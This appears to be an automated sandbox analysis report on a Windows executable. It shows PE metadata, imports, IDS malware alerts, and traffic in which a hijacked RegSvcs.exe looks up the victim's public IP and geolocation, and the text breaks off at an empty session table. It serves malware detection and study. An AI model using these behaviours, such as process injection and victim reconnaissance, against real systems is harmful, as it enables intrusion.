                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6757B009 [Tue Dec 10 03:05:45 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                  Instruction
                                                                  call 00007F1C30881B8Ah
                                                                  jmp 00007F1C30874954h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1C30874ADAh
cmp edi, eax
jc 00007F1C30874E3Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F1C30874AD9h
rep movsb
jmp 00007F1C30874DECh
cmp ecx, 00000080h
jc 00007F1C30874CA4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1C30874AE0h
bt dword ptr [004BE324h], 01h
jc 00007F1C30874FB0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F1C30874C7Dh
test edi, 00000003h
jne 00007F1C30874C8Eh
test esi, 00000003h
jne 00007F1C30874C6Dh
bt edi, 02h
jnc 00007F1C30874ADFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1C30874AE3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1C30874B35h
bt esi, 03h
jnc 00007F1C30874B88h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x46ff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10e000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x46ff8 | 0x47000 | 26fe582d2da1aa92bc27191609296708 | False | 0.9081928091989436 | data | 7.846330782981907 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10e000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x3e2c0 | data | | | 1.0003377104800202
RT_GROUP_ICON | 0x10da78 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10daf0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10db04 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10db18 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10db2c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10dc08 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T14:11:35.342732+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2024-12-16T14:11:46.858321+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 14:11:33.600625992 CET | 55897 | 53 | 192.168.2.5 | 1.1.1.1
Dec 16, 2024 14:11:33.738308907 CET | 53 | 55897 | 1.1.1.1 | 192.168.2.5
Dec 16, 2024 14:11:35.304111958 CET | 55868 | 53 | 192.168.2.5 | 1.1.1.1
Dec 16, 2024 14:11:35.444885969 CET | 53 | 55868 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 14:11:33.600625992 CET | 192.168.2.5 | 1.1.1.1 | 0xf124 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:35.304111958 CET | 192.168.2.5 | 1.1.1.1 | 0x4c99 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 14:11:33.738308907 CET | 1.1.1.1 | 192.168.2.5 | 0xf124 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 14:11:33.738308907 CET | 1.1.1.1 | 192.168.2.5 | 0xf124 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:33.738308907 CET | 1.1.1.1 | 192.168.2.5 | 0xf124 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:33.738308907 CET | 1.1.1.1 | 192.168.2.5 | 0xf124 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:33.738308907 CET | 1.1.1.1 | 192.168.2.5 | 0xf124 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:33.738308907 CET | 1.1.1.1 | 192.168.2.5 | 0xf124 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:35.444885969 CET | 1.1.1.1 | 192.168.2.5 | 0x4c99 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 14:11:35.444885969 CET | 1.1.1.1 | 192.168.2.5 | 0x4c99 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
                                                                  • reallyfreegeoip.org
                                                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | 6660 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:11:33.879700899 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Dec 16, 2024 14:11:34.962044954 CET | 321 | IN | HTTP/1.1 200 OK
  Date: Mon, 16 Dec 2024 13:11:34 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: ecccd52dfef66ed2af0c5547694cc57a
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:11:34.966798067 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Dec 16, 2024 14:11:35.289741993 CET | 321 | IN | HTTP/1.1 200 OK
  Date: Mon, 16 Dec 2024 13:11:35 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 992ba9afd18e09a0be27f73801f90c22
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | 3128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:11:45.228811026 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Dec 16, 2024 14:11:46.334930897 CET | 321 | IN | HTTP/1.1 200 OK
  Date: Mon, 16 Dec 2024 13:11:46 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: d8a1bc54896af76b2f2360f0c067e8e1
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:11:46.342533112 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Dec 16, 2024 14:11:46.806665897 CET | 321 | IN | HTTP/1.1 200 OK
  Date: Mon, 16 Dec 2024 13:11:46 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: e1460d3a70c9fe8b9cee8366ae90fc5d
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 104.21.67.152 | 443 | 6660 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 13:11:36 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2024-12-16 13:11:37 UTC | 886 | IN | HTTP/1.1 200 OK
  Date: Mon, 16 Dec 2024 13:11:37 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Cache-Control: max-age=31536000
  CF-Cache-Status: HIT
  Age: 343466
  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hR28hnkOGZ%2BU2ljD23XVRqN6FU%2FrIOYt9rFlQIsOgd0qyVaLTcS2NhpGEhAE3lBDB%2BShJja%2BYeenUyl%2BBFzjqFmcfoVMcwVxrGnITjExLMERjOiRsnfrh0RdR%2BHcAK%2FPZ2iHnU1b"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8f2eeb993b8c19b2-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=12716&min_rtt=1875&rtt_var=7296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1557333&cwnd=149&unsent_bytes=0&cid=b59fa3db41b91c67&ts=453&x=0"
2024-12-16 13:11:37 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49709 | 104.21.67.152 | 443 | 3128 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
